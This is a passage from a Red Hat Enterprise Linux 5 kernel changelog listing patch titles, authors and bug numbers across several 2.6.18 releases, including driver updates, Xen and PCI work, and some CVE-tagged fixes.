sas: comment cleanup (Rob Evers ) [485126]\n- [misc] FIPS: create checksum for verification at bootup (Don Zickus ) [444632]\n- [md] dm: raid45 target oops on mapping table reload (Heinz Mauelshagen ) [500387]\n- [md] dm: raid45 target doesnt create parity as expected (Heinz Mauelshagen ) [499406]\n- [net] igb: correctly free multiqueue netdevs (Andy Gospodarek ) [500446]\n- [misc] lockdep: fix large lock subgraph traversal (Aristeu Rozanski ) [462248]\n- [crypto] make tcrypt stay loaded on success (Jarod Wilson ) [499646]\n- [crypto] block use of non-fips algs in fips mode (Jarod Wilson ) [499646]\n- [crypto] mark algs allowed in fips mode (Jarod Wilson ) [499646]\n- [x86_64] 32-bit ptrace emulation mishandles 6th arg (Jiri Olsa ) [495125]\n- [fs] cifs: buffer overruns when converting strings (Jeff Layton ) [496577]\n- [scsi] lpfc: update from version 8.2.0.41 to 8.2.0.43 (Rob Evers ) [498524]\n- [cpufreq] xen: powernow identifies wrong number of procs (Miroslav Rezanina ) [456437]\n- [scsi] MPT fusion: remove annoying debug message v2 (Tomas Henzl ) [475455]\n- [scsi] MPT fusion: make driver legacy I/O port free v2 (Tomas Henzl ) [475451]\n- [scsi] MPT fusion: update version 3.04.07rh v2 (Tomas Henzl ) [475455]\n- [ia64] fix regression in nanosleep syscall (Prarit Bhargava ) [499289]\n- [md] s390: I/O stall when performing random CHPID off/on (Mikulas Patocka ) [500729]\n- [crypto] add hmac and hmac(sha512) test vectors (Jarod Wilson ) [499463]\n- [sched] accurate task runtime accounting (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [sched] rq clock (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [x86] scale cyc_2_nsec according to CPU frequency (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [i386] untangle xtime_lock vs update_process_times (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [x86_64] clean up time.c (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [net] tun: add packet accounting (Herbert Xu ) [495863]\n- [kabi] add pcie_set_readrq (Jon Masters ) [479200]\n- [kabi] add Kernel Virtual Machine kABI symbols (Jon Masters ) [466961]\n- [crypto] add ctr test vectors (Jarod Wilson ) [497888]\n- [crypto] print self-test success notices in fips mode (Jarod Wilson ) [497885]\n- [mm] fork vs fast gup race fix (Andrea Arcangeli ) [471613]\n- [mm] support for lockless get_user_pages (aarcange@redhat.com ) [474913]\n- Revert: [mm] fork vs gup race fix (aarcange@redhat.com ) [471613]\n- [net] r8169: reset IntrStatus after chip reset (Ivan Vecera ) [500740]\n- Revert: [net] forcedeth: power down phy when IF is down (Ivan Vecera ) [479740]\n- [misc] add AMD IOMMU support to KVM (Bhavna Sarathy ) [481026]\n- [misc] VT-d: backport of Intel VT-d support to RHEL5 (Don Dutile ) [480411]\n- [misc] VT-d: add clflush_cache_range function (Don Dutile ) [480411]\n- [misc] VT-d: add DMAR-related timeout definition (Don Dutile ) [480411]\n- [misc] VT-d: add DMAR ACPI table support (Don Dutile ) [480411]\n- [misc] VT-d: add pci_find_upstream_pcie_bridge (Don Dutile ) [480411]\n- [misc] VT-d: move common MSI defines to msi.h (Don Dutile ) [480411]\n- [trace] blk tracepoints (Arnaldo Carvalho de Melo ) [493454]\n- [pci] enable CONFIG_PCI_IOV (ddugger@redhat.com ) [493152]\n- [pci] save and restore PCIe 2.0 registers (ddugger@redhat.com ) [493152]\n- [pci] restore PCI-E capability registers after PM event (ddugger@redhat.com ) [493152]\n- [pci] add SR-IOV API for Physical Function driver (ddugger@redhat.com ) [493152]\n- [pci] centralize device setup code (ddugger@redhat.com ) [493152]\n- [pci] reserve bus range for SR-IOV device (ddugger@redhat.com ) [493152]\n- [pci] restore saved SR-IOV state (ddugger@redhat.com ) [493152]\n- [pci] initialize and release SR-IOV capability (ddugger@redhat.com ) [493152]\n- [pci] add a new function to map BAR offsets (ddugger@redhat.com ) [493152]\n- [pci] allow pci_alloc_child_bus to handle a NULL bridge (ddugger@redhat.com ) [493152]\n- [pci] enhance pci_ari_enabled (ddugger@redhat.com ) [493152]\n- [pci] fix ARI code to be compatible with mixed systems (ddugger@redhat.com ) [493152]\n- [pci] support PCIe ARI capability (ddugger@redhat.com ) [493152]\n- [pci] export __pci_read_base (ddugger@redhat.com ) [493152]\n- [pci] fix 64-vbit prefetchable memory resource BARs (ddugger@redhat.com ) [493152]\n- [pci] handle 64-bit resources better on 32-bit machines (ddugger@redhat.com ) [493152]\n- [pci] rewrite PCI BAR reading code (ddugger@redhat.com ) [493152]\n- [xen] add Credit Scheduler Fairness and hard virt (Justin M. Forbes ) [432700]\n- [xen] x86_64: add 1GB page table support (Bhavna Sarathy ) [251982]\n[2.6.18-146.el5]\n- [fs] vfs freeze: use vma->v_file to get to superblock (Eric Sandeen ) [476148]\n- [net] tg3: allow 5785 to work when running at 10Mbps (Andy Gospodarek ) [469772]\n- [net] af_iucv: race when queuing incoming iucv messages (Hans-Joachim Picht ) [499626]\n- [trace] sunrpc: adding trace points to status routines (Steve Dickson ) [499008]\n- [gfs2] fix glock ref count issue (Steven Whitehouse ) [485098]\n- [kabi] add acpi_bus_register_driver (Jon Masters ) [462911]\n- [kabi] add nobh_truncate_page and kernel_read (Jon Masters ) [497276]\n- [usb] support Huaweis mode switch in kernel (Pete Zaitcev ) [485182]\n- [scsi] ibmvscsi: LPAR hang on a multipath device (AMEET M. PARANJAPE ) [498927]\n- [wireless] mac80211: scanning related fixes (John W. Linville ) [498719]\n- [fs] ecryptfs: remove ecryptfs_unlink_sigs warnings (Eric Sandeen ) [499171]\n- [fs] ext4: re-fix warning on x86 build (Eric Sandeen ) [499202]\n- [ppc64] adjust oprofile_cpu_type detail (AMEET M. PARANJAPE ) [496709]\n- [nfs] SELinux can copy off the top of the stack (Eric Paris ) [493144]\n- [xen] x86: explicitly zero CR[1] in getvcpucontext (Miroslav Rezanina ) [494876]\n- [xen] x86: fix overflow in the hpet code (Rik van Riel ) [449346]\n- [xen] x86: fixes to the 'no missed-tick accounting' code (Rik van Riel ) [449346]\n- [xen] introduce 'no missed-tick accounting' (Rik van Riel ) [449346]\n- [xen] x86: misc fixes to the timer code (Rik van Riel ) [449346]\n- [xen] x86: initialize vlapic->timer_last_update (Rik van Riel ) [449346]\n[2.6.18-145.el5]\n- [ia64] xen: switch from flipping to copying interface (Chris Lalancette ) [479754]\n- [scsi] fnic: init retry counter (Mike Christie ) [484438]\n- [misc] add some long-missing capabilities to CAP_FS_MASK (Eric Paris ) [499076 497272] {CVE-2009-1072}\n- [crypto] add ansi_cprng test vectors (Jarod Wilson ) [497891]\n- [crypto] add rng self-test infra (Jarod Wilson ) [497891]\n- [md] bitmap merge feature (Doug Ledford ) [481226]\n- [md] fix lockup on read error (Doug Ledford ) [465781]\n- [md] dm-raid45: corrupt data and premature end of synch (Heinz Mauelshagen ) [480733 479383]\n- [fs] generic freeze ioctl interface (Eric Sandeen ) [476148]\n- [scsi] add mpt2sas driver (Tomas Henzl ) [475665]\n- [misc] kprobes: fix deadlock issue (John Villalovos ) [210555]\n- [block] disable iostat collection in gendisk (Jerome Marchand ) [484158]\n- [block] fix request flags (Jerome Marchand ) [484158]\n- [misc] fix blktrace api breakage (Hans-Joachim Picht ) [475334]\n- [fs] fuse: update for RHEL-5.4 (Josef Bacik ) [457975]\n[2.6.18-144.el5]\n- Revert: [scsi] MPT Fusion: update to version 3.04.07rh (Tomas Henzl ) [475455]\n- Revert: [scsi] make fusion MPT driver legacy I/O port free (Tomas Henzl ) [475451]\n- Revert: [scsi] MPT fusion: remove annoying debug message (Tomas Henzl ) [475455]\n- [openib] ehca: fix performance during creation of QPs (AMEET M. PARANJAPE ) [498527]\n- [scsi] qla4xxx: fix driver fault recovery (Marcus Barrow ) [497478]\n- [misc] make bus_find_device more robust, match upstream (Don Dutile ) [492488]\n- [md] dm snapshot: refactor __find_pending_exception (Mikulas Patocka ) [496100]\n- [md] race conditions in snapshots (Mikulas Patocka ) [496100]\n- [md] dm-raid1: switch read_record from kmalloc to slab (Mikulas Patocka ) [496101]\n- [md] dm-raid1/mpath: partially completed request crash (Mikulas Patocka ) [496101]\n- [md] snapshot: store damage (Mikulas Patocka ) [496102]\n- [scsi] cciss: change in discovering memory bar (Tomas Henzl ) [474392]\n- [scsi] cciss: version change for RHEL-5.4 (Tomas Henzl ) [474392]\n- [scsi] cciss: thread to detect config changes on MSA2012 (Tomas Henzl ) [474392]\n- [scsi] cciss: changes in config functions (Tomas Henzl ) [474392]\n- [openib] update all the backports for the code refresh (Doug Ledford ) [476301]\n- [openib] add support for XRC queues (Doug Ledford ) [476301]\n- [openib] RDS: add the RDS protocol (Doug Ledford ) [477065]\n- [openib] IPoIB: update to OFED 1.4.1-rc3 (Doug Ledford ) [434779 466086]\n- [openib] SRP: update to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] SDP: update to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] qlgc_vnic: update to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] cxgb3: update driver to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] iw_nes: update NES iWARP to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] mthca: update driver to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] ipath: update driver to OFED 1.4.1-rc3 (Doug Ledford ) [230035 480696]\n- [openib] ehca: update driver for RHEL-5.4 (Doug Ledford ) [466086]\n- [openib] core: disable lock dep annotation (Don Zickus ) [476301]\n- [openib] core: update core code to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] rmda: update rdma headers to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] mlx4: Update mlx4_ib and mlx4_core, add mlx4_en (Doug Ledford ) [456525 477065]\n- [openib] enable mlx4_en and rds, disable iw_c2 (Doug Ledford ) [476301]\n- [mm] add tracepoints (Larry Woodman ) [493444]\n[2.6.18-143.el5]\n- [net] bonding: ignore updelay param when no active slave (Jiri Pirko ) [495318]\n- [net] ipv6: fix incoming packet length check (Jiri Pirko ) [492972]\n- [misc] drivers fix dma_get_required_mask (Tomas Henzl ) [475455]\n- [gfs2] NFSv2 support (Steven Whitehouse ) [497954]\n- [ppc64] set error_state to pci_channel_io_normal (AMEET M. PARANJAPE ) [496872]\n- [mm] allow tuning of MAX_WRITEBACK_PAGES (Larry Woodman ) [479079]\n- [trace] add 'success' to sched_wakeup/sched_wakeup_new (Jason Baron ) [497414]\n- [scsi] update iscsi layer and drivers for RHEL-5.4 (mchristi@redhat.com ) [436791 484455]\n- [crypto] fips: panic box when module validation fails (Neil Horman ) [497228]\n- [scsi] st: option to use SILI in variable block reads (Tom Coughlan ) [457970]\n- [net] bonding: support for bonding of IPoIB interfaces (Andy Gospodarek ) [430758]\n- [net] bonding: update to upstream version 3.4.0 (Andy Gospodarek ) [462632]\n- [scsi] add md3000 and md3000i entries to rdac_dev_list (John Feeney ) [487293]\n- [trace] tracepoints for page cache (KII Keiichi ) [475719]\n- [trace] tracepoints for network socket (KII Keiichi ) [475719]\n- [scsi] stex: support promise 6Gb sas raid controller (David Milburn ) [492022]\n- [scsi] add ALUA scsi device handler (mchristi@redhat.com ) [482737]\n- [scsi] update fnic fcoe driver for RHEL-5.4 (mchristi@redhat.com ) [484438]\n- [scsi] update libfc/fcoe for RHEL-5.4 (mchristi@redhat.com ) [484438]\n- [video] efifb: driver update (Brian Maly ) [488820]\n- [fs] fix softlockup in posix_locks_deadlock (Josef Bacik ) [476659]\n- [fs] cifs: unicode alignment and buffer sizing problems (Jeff Layton ) [494280] {CVE-2009-1439}\n- [mm] vmscan: bail out of direct reclaim after max pages (Rik van Riel ) [495442]\n- [crypto] add self-tests for rfc4309 (Jarod Wilson ) [472386]\n- [crypto] handle ccm dec test vectors expected to fail (Jarod Wilson ) [472386]\n- [crypto] fix rfc4309 deadlocks (Jarod Wilson ) [472386]\n- [scsi] marvell sas: comment cleanup (Rob Evers ) [485126]\n- [scsi] marvell sas: correct bit-map implementation (Rob Evers ) [485126]\n- [scsi] marvell sas: initial patch submission (Rob Evers ) [485126]\n- [acpi] CPU P-state limits ignored by OS (Stanislaw Gruszka ) [494288]\n- [net] provide a generic SIOETHTOOL ETHTOOL_GPERMADDR (Flavio Leitner ) [462352]\n- [scsi] lpfc: update to version 8.2.0.41 (Rob Evers ) [476738]\n- [scsi] lpfc: update to version 8.2.0.40 (Rob Evers ) [476738]\n- [scsi] lpfc: update to version 8.2.0.39 (Rob Evers ) [476738]\n- [scsi] lpfc: update to version 8.2.0.38 (Rob Evers ) [476738]\n[2.6.18-142.el5]\n- [net] ipv4: remove uneeded bh_lock/unlock from udp_rcv (Neil Horman ) [484590]\n- [net] ixgbe: update to upstream version 2.0.8-k2 (Andy Gospodarek ) [472547]\n- [net] igb: update to upstream version 1.3.16-k2 (Andy Gospodarek ) [484102 474881]\n- [mm] vmalloc: dont pass __GFP_ZERO to slab (Jiri Olsa ) [491685]\n- [agp] zero pages before sending to userspace (Jiri Olsa ) [497026] {CVE-2009-1192}\n- [net] e1000: enable TSO6 via ethtool with correct hw (Andy Gospodarek ) [449175]\n- [net] tg3: update to version 3.96 (Andy Gospodarek ) [481715 469772]\n- [x86] apic: rollover in calibrate_APIC_clock (Brian Maly ) [456938]\n- [alsa] handle subdevice_mask in snd_pci_quirk_lookup (Jaroslav Kysela ) [473949 483594]\n- [ia64] altix: performance degradation in PCI mode (George Beshers ) [497136]\n- [misc] I/O AT: config file changes (John Feeney ) [436048]\n- [misc] I/O AT: new ioat*.c (John Feeney ) [436048]\n- [misc] I/O AT: new dmaengine_v3.c (John Feeney ) [436048]\n- [misc] I/O AT: new include files (John Feeney ) [436048]\n- [misc] I/O AT: add drivers/dca (John Feeney ) [436048]\n- [misc] I/O AT: update network changes (John Feeney ) [436048]\n- [misc] I/O AT: update existing files (John Feeney ) [436048]\n- [misc] I/O AT: update include files (John Feeney ) [436048]\n- [mm] tweak vm diry_ratio to prevent stalls on some DBs (Larry Woodman ) [295291]\n- [nfs] setacl not working over NFS (Peter Staubach ) [496903]\n- [fs] ext4: update config options (Eric Sandeen ) [485315]\n- [fs] ext4: post-2.6.29 fixes (Eric Sandeen ) [485315]\n- [fs] backport patch for 2.6.29 ext4 (Eric Sandeen ) [485315]\n- [fs] rebase ext4 and jbd2 to 2.6.29 codebase (Eric Sandeen ) [485315 487933 487940 487944 487947] {CVE-2009-0745 CVE-2009-0746 CVE-2009-0747 CVE-2009-0748}\n- [fs] update write_cache_pages (Eric Sandeen ) [485315]\n- [fs] export set_task_ioprio (Eric Sandeen ) [485315]\n- [scsi] qla2xxx : updates and fixes from upstream, part 4 (Marcus Barrow ) [496126]\n- [scsi] MPT fusion: remove annoying debug message (Tomas Henzl ) [475455]\n- [scsi] make fusion MPT driver legacy I/O port free (Tomas Henzl ) [475451]\n- [scsi] MPT Fusion: update to version 3.04.07rh (Tomas Henzl ) [475455]\n- [x86] add MAP_STACK mmap flag (Larry Woodman ) [459321]\n- [scsi] sym53c8xx_2: fix up hotplug support (mchristi@redhat.com ) [461006]\n- [scsi] qla2xxx : updates and fixes from upstream, part 3 (Marcus Barrow ) [495094]\n- [scsi] qla2xxx : updates and fixes from upstream, part 2 (Marcus Barrow ) [495092]\n- [scsi] qla2xxx : updates and fixes from upstream, part 1 (Marcus Barrow ) [480204]\n- [nfs] memory leak when reading files wth option 'noac' (Peter Staubach ) [493045]\n- [x86] powernow-k8: export module parameters via sysfs (Prarit Bhargava ) [492010]\n- [misc] IO accounting: tgid accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: read accounting nfs fix (Jerome Marchand ) [461636]\n- [misc] IO accounting: read accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: write cancel accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: report in procfs (Jerome Marchand ) [461636]\n- [misc] IO accounting: account for direct-io (Jerome Marchand ) [461636]\n- [misc] IO accounting: set CONFIG_TASK_IO_ACCOUNTING (Jerome Marchand ) [461636]\n- [misc] IO accounting: write accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: core statistics (Jerome Marchand ) [461636]\n- [misc] IO accounting: read accounting cifs fix (Jerome Marchand ) [461636]\n- [misc] auxiliary signal structure: signal_struct_aux (Jerome Marchand ) [461636]\n- [misc] auxiliary signal structure: preparation (Jerome Marchand ) [461636]\n- [xen] x86: fix MSI eoi handling for HVM passthru (Gerd Hoffmann ) [477261]\n[2.6.18-141.el5]\n- [x86_64] more cpu_khz to tsc_khz conversions (Prarit Bhargava ) [483300]\n- [gfs2] unaligned access in gfs2_bitfit (Abhijith Das ) [485226]\n- [gfs2] remove scand & glockd kernel processes (Benjamin Marzinski ) [273001]\n- [x86] fix tick divider with clocksource=pit (Chris Lalancette ) [427588]\n- [fs] autofs4: fix incorect return in autofs4_mount_busy (Ian Kent ) [496766]\n- [x86] fix cpuid.4 instrumentation (Brian Maly ) [454981]\n- [md] dm-mpath: propagate ioctl error codes (Benjamin Marzinski ) [461469]\n- [fs] aio: race in aio_complete leads to process hang (Jeff Moyer ) [475814]\n- [s390] enable raw devices (Jeff Moyer ) [452534]\n- [net] bnx2: update to latest upstream - 1.9.3 (Ivan Vecera ) [475567 476897 489519]\n- [net] forcedeth: update to upstream version 0.62 (Ivan Vecera ) [479740]\n- [net] r8169: dont update stats counters when IF is down (Ivan Vecera ) [490162]\n- [net] r8169: fix RxMissed register access (Ivan Vecera ) [474334]\n- [x86] prevent boosting kprobes on exception address (Masami Hiramatsu ) [493088]\n- [gfs2] add fiemap support (Steven Whitehouse ) [476626]\n- [net] e1000e: fix false link detection (Michal Schmidt ) [492270]\n- [ppc] pseries: set error_state to pci_channel_io_normal (AMEET M. PARANJAPE ) [496872]\n- [nfs] large writes rejected when sec=krb5i/p specified (Peter Staubach ) [486756]\n- [wireless] iwlwifi: problems switching b/w WPA and WEP (John W. Linville ) [474699]\n- [net] ipv6: assume loopback address in link-local scope (Jiri Pirko ) [487233]\n- [fs] keep eventpoll from locking up the box (Josef Bacik ) [487585]\n- [ppc64] adjust oprofile_cpu_type (AMEET M. PARANJAPE ) [496709]\n- [fs] jbd: properly dispose of unmapped data buffers (Josef Bacik ) [479296]\n- [fs] ext3: dir_index: error out on corrupt dx dirs (Josef Bacik ) [454942]\n- [fs] ext3: dont resize if no reserved gdt blocks left (Josef Bacik ) [443541]\n- [agp] add pci ids for new video cards (John Villalovos ) [474513]\n- [ata] sata_mv: fix chip type for RocketRaid 1740/1742 (David Milburn ) [496338]\n- [misc] exit_notify: kill the wrong capable check (Oleg Nesterov ) [494271] {CVE-2009-1337}\n- [ipmi] fix platform crash on suspend/resume (peterm@redhat.com ) [475536]\n- [ipmi] fix some signedness issues (peterm@redhat.com ) [475536]\n- [ipmi] hold ATTN until upper layer is ready (peterm@redhat.com ) [475536]\n- [ipmi] allow shared interrupts (peterm@redhat.com ) [475536]\n- [scsi] add missing SDEV_DEL state if slave_alloc fails (Tomas Henzl ) [430170]\n- [net] eHEA: mutex_unlock missing in eHEA error path (AMEET M. PARANJAPE ) [482796]\n- [misc] xen: change PVFB not to select abs. pointer (Markus Armbruster ) [492866]\n- [pci] pci-stub module to reserve pci device (Mark McLoughlin ) [491842]\n- [pci] add remove_id sysfs entry (Mark McLoughlin ) [491842]\n- [pci] use proper call to driver_create_file (Mark McLoughlin ) [491842]\n- [pci] fix __pci_register_driver error handling (Mark McLoughlin ) [491842]\n- [misc] add /sys/bus/*/driver_probe (Mark McLoughlin ) [491842]\n- [misc] backport new ramdisk driver (Don Howard ) [480663]\n- [x86] general pci_scan_bus fix for baremetal and xen (Prarit Bhargava ) [494114]\n- [misc] add HP xw460c to bf sort pci list (Prarit Bhargava ) [490068]\n- [mm] enable dumping of hugepages into core dumps (Dave Anderson ) [470411]\n- [misc] hrtimer: check relative timeouts for overflow (AMEET M. PARANJAPE ) [492230]\n- [acpi] add T-state notification support (Luming Yu ) [487567]\n- [x86_64] copy_user_c can zero more data than needed (Vitaly Mayatskikh ) [490938]\n- [misc] hpilo: backport bugfixes and updates for RHEL-5.4 (tcamuso@redhat.com ) [488964]\n- [pci] do not clear PREFETCH register (Prarit Bhargava ) [486185]\n- [misc] waitpid reports stopped process more than once (Vitaly Mayatskikh ) [481199]\n- [scsi] ipr: enhance driver to support MSI-X interrupt (AMEET M. PARANJAPE ) [475717]\n- [specfile] add ability to build only debug kernel (Jeff Layton ) [469707]\n- [xen] clear X86_FEATURE_APIC in cpuid when apic disabled (ddugger@redhat.com ) [496873]\n- [xen] enable systems without APIC (ddugger@redhat.com ) [496873]\n- [xen] vt-d: workaround for Mobile Series 4 Chipset (ddugger@redhat.com ) [496873]\n- [xen] pci: fix definition of PCI_PM_CTRL_NO_SOFT_RESET (ddugger@redhat.com ) [496873]\n- [xen] utilise the GUEST_PAT and HOST_PAT vmcs area (ddugger@redhat.com ) [496873]\n- [xen] VT-d: enhance MTRR/PAT virtualization (ddugger@redhat.com ) [496873]\n- [xen] fix interrupt remapping on AMD systems (Bhavna Sarathy ) [477261]\n- [xen] enable AMD IOMMU Xen driver (Bhavna Sarathy ) [477261]\n- [xen] add AMD IOMMU Xen driver (Bhavna Sarathy ) [477261]\n- [xen] live migration failure due to fragmented memory (Jiri Denemark ) [469130]\n[2.6.18-140.el5]\n- [fs] xfs: add fiemap support (Josef Bacik ) [296951]\n- [net] add DSCP netfilter target (Thomas Graf ) [481652]\n- [gfs2] blocked after recovery (Abhijith Das ) [483541]\n- [net] remove misleading skb_truesize_check (Thomas Graf ) [474883]\n- [mm] 100% time spent under NUMA when zone_reclaim_mode=1 (Larry Woodman ) [457264]\n- [mm] msync does not sync data for a long time (Larry Woodman ) [479079]\n- [md] dm: fix OOps in mempool_free when device removed (Milan Broz ) [495230]\n- [net] bonding: clean up resources upon removing a bond (Masahiro Matsuya ) [463244]\n- [fs] nfs: convert to new aops (Jeff Layton ) [476224]\n- [fs] cifs: update CIFS for RHEL5.4 (Jeff Layton ) [465143]\n- [misc] types: add fmode_t typedef (Jeff Layton ) [465143]\n- [misc] keys: key facility changes for AF_RXRPC (Jeff Layton ) [465143]\n- [misc] xen: bump max_phys_cpus to 256 (Chris Lalancette ) [477206]\n- [misc] fork: CLONE_PARENT && parent_exec_id interaction (Don Howard ) [479964]\n- [wireless] iwlagn: make swcrypto/swcrypto50=1 default (John W. Linville ) [474699]\n- [wireless] mac80211: avoid null deref (John W. Linville ) [482990]\n- [net] fix out of bound access to hook_entries (Thomas Graf ) [484036]\n- [net] sctp: allow sctp_getladdrs to work for IPv6 (Neil Horman ) [492633]\n- [x86] xen: fix interaction between dom0 and NTP (Rik van Riel ) [494879]\n- [ata] sata_mv: fix 8-port timeouts on 508x/6081 chips (David Milburn ) [493451]\n- [net] fixed tcp_ack to properly clear ->icsk_probes_out (Jiri Olsa ) [494427]\n- [x86] xen: crash when specifying mem= (Chris Lalancette ) [240429]\n- [scsi] qla2xxx: reduce DID_BUS_BUSY failover errors (Marcus Barrow ) [244967]\n- [ata] libata: ahci enclosure management bios workaround (David Milburn ) [488471]\n- [scsi] aic7xxx: increase max IO size (mchristi@redhat.com ) [493448]\n- [nfs] v4: client crash on file lookup with long names (Sachin S. Prabhu ) [493942]\n- [mm] fix prepare_hugepage_range to check offset (Larry Woodman ) [488260]\n- [misc] make sure fiemap.h is installed in headers pkg (Josef Bacik ) [296951]\n- [fs] generic block based fiemap (Josef Bacik ) [296951]\n- [fs] add fiemap interface (Josef Bacik ) [296951]\n- [trace] use unregister return value (Jason Baron ) [465543]\n- [trace] change rcu_read_sched -> rcu_read (Jason Baron ) [465543]\n- [trace] introduce noupdate apis (Jason Baron ) [465543]\n- [trace] simplify rcu usage (Jason Baron ) [465543]\n- [trace] fix null pointer dereference (Jason Baron ) [465543]\n- [trace] tracepoints fix reentrancy (Jason Baron ) [465543]\n- [trace] make tracepoints use rcu sched (Jason Baron ) [465543]\n- [trace] use TABLE_SIZE macro (Jason Baron ) [465543]\n- [trace] remove kernel-trace.c (Jason Baron ) [465543]\n- [trace] remove prototype from tracepoint name (Jason Baron ) [465543]\n- [x86] use CPU feature bits to skip tsc_unstable checks (Chris Lalancette ) [463573]\n- [x86] vmware: disable softlock processing on tsc systems (Chris Lalancette ) [463573]\n- [x86] vmware lazy timer emulation (Chris Lalancette ) [463573]\n- [x86] xen: improve KVM timekeeping (Chris Lalancette ) [463573]\n- [x86_64] xen: implement a minimal TSC based clocksource (Chris Lalancette ) [463573]\n- [x86] use cpu_khz for loops_per_jiffy calculation (Chris Lalancette ) [463573]\n- [x86] vmware: look for DMI string in product serial key (Chris Lalancette ) [463573]\n- [x86] VMware: Fix vmware_get_tsc code (Chris Lalancette ) [463573]\n- [x86] xen: add X86_FEATURE_HYPERVISOR feature bit (Chris Lalancette ) [463573]\n- [x86] xen: changes timebase calibration on Vmware (Chris Lalancette ) [463573]\n- [x86] add a synthetic TSC_RELIABLE feature bit (Chris Lalancette ) [463573]\n- [x86] hypervisor: detection and get tsc_freq (Chris Lalancette ) [463573]\n- [x86] fdiv bug detection fix (Chris Lalancette ) [463573]\n- [misc] printk: add KERN_CONT (Chris Lalancette ) [463573]\n- [s390] add additional card IDs to CEX2C and CEX2A (Hans-Joachim Picht ) [488496]\n- [gfs2] merge upstream uevent patches into RHEL 5.4 (Steven Whitehouse ) [476707]\n- [xen] x86: GDT: replace single page with one page/CPU (Chris Lalancette ) [477206]\n- [xen] x86: VPID: free resources (ddugger@redhat.com ) [464821]\n- [xen] x86: VPID: implement feature (ddugger@redhat.com ) [464821]\n- [xen] fix 32-on-64 PV oops in xen_set_pud (Chris Lalancette ) [467698]\n[2.6.18-139.el5]\n- [pci] xen dom0: hook PCI probe and remove callbacks (ddugger@redhat.com ) [484227]\n- [misc] xen dom0: add hypercall for add/remove PCI device (ddugger@redhat.com ) [484227]\n- [pci] xen: dom0/domU MSI support using PHSYDEV_map_irq (ddugger@redhat.com ) [484227]\n- [mm] mmu_notifier: kabi workaround support (john cooper ) [485718]\n- [mm] mmu_notifier: set CONFIG_MMU_NOTIFIER to y (john cooper ) [485718]\n- [mm] mmu-notifier: optimized ability to admin host pages (john cooper ) [485718]\n- [mm] mmu-notifiers: add mm_take_all_locks operation (john cooper ) [485718]\n- [misc] introduce list_del_init_rcu (john cooper ) [485718]\n- [ppc] spufs: fix incorrect buffer offset in regs write (AMEET M. PARANJAPE ) [493426]\n- [ppc] spufs: check offset before calculating write size (AMEET M. PARANJAPE ) [493426]\n- [net] add dropmonitor protocol (Neil Horman ) [470539]\n- [ppc] reject discontiguous MSI-X requests (AMEET M. PARANJAPE ) [492580]\n- [ppc] implement a quota system for MSIs (AMEET M. PARANJAPE ) [492580]\n- [ppc] return req#msi(-x) if request is larger (AMEET M. PARANJAPE ) [492580]\n- [ppc] msi: return the number of MSIs we could allocate (AMEET M. PARANJAPE ) [492580]\n- [ppc] check for MSI-X also in rtas_msi_pci_irq_fixup() (AMEET M. PARANJAPE ) [492580]\n- [ppc] add support for ibm,req#msi-x (AMEET M. PARANJAPE ) [492580]\n- [ppc] fix MSI-X interrupt querying (AMEET M. PARANJAPE ) [492580]\n- [ppc] msi: return the number of MSI-X available (AMEET M. PARANJAPE ) [492580]\n- [trace] add include/trace dir to -devel (Jason Baron ) [489096]\n- [mm] xen: 'ptwr_emulate' messages when booting PV guest (Chris Lalancette ) [490567]\n- [fs] lockd: reference count leaks in async locking case (Jeff Layton ) [471254]\n- [s390] kernel: cpcmd with vmalloc addresses (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: error handling in iucv_callback_txdone (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: broken send_skb_q result in endless loop (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: free iucv path/socket in path_pending cb (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: avoid left over IUCV connections (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: new error return codes for connect (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: hang if recvmsg is used with MSG_PEEK (Hans-Joachim Picht ) [487703]\n- [net] ixgbe: stop double counting frames and bytes (Andy Gospodarek ) [487213]\n- [net] netfilter: x_tables: add connlimit match (Jiri Pirko ) [483588]\n- [nfs] only set file_lock.fl_lmops if stateowner is found (Jeff Layton ) [479323]\n- [dlm] init file_lock before copying conflicting lock (Jeff Layton ) [479323]\n- [nfs] nfsd: ensure nfsv4 calls the fs on LOCKT (Jeff Layton ) [479323]\n- [net] allow for on demand emergency route cache flushing (Neil Horman ) [461655]\n- [xen] x86: update the earlier APERF/MPERF patch (Chris Lalancette ) [493557]\n- [xen] fix evtchn exhaustion with 32-bit HVM guest (Chris Lalancette ) [489274]\n- [xen] ia64: fix HVM guest kexec (Chris Lalancette ) [418591]\n- [xen] ia64: fix whitespace error in vmx.h (Chris Lalancette ) [477098]\n- [xen] add hypercall for adding and removing PCI devices (ddugger@redhat.com ) [484227]\n- [xen] HVM MSI passthrough support (ddugger@redhat.com ) [484227]\n- [xen] VT-d2: enable interrupt remapping for MSI/MSI-x (ddugger@redhat.com ) [484227]\n- [xen] MSI support interface (ddugger@redhat.com ) [484227]\n- [xen] MSI supprt internal functions (ddugger@redhat.com ) [484227]\n- [xen] convert pirq to per-domain (ddugger@redhat.com ) [484227]\n- [xen] rename evtchn_lock to event_lock (ddugger@redhat.com ) [484227]\n- [xen] sync VT-d2 code with xen-unstable (ddugger@redhat.com ) [484227]\n- [xen] VT-d2: support interrupt remapping (ddugger@redhat.com ) [484227]\n- [xen] VT-d2: support queue invalidation (ddugger@redhat.com ) [484227]\n- [xen] x86: emulate accesses to PCI window regs cf8/cfc (ddugger@redhat.com ) [484227]\n- [xen] vtd: 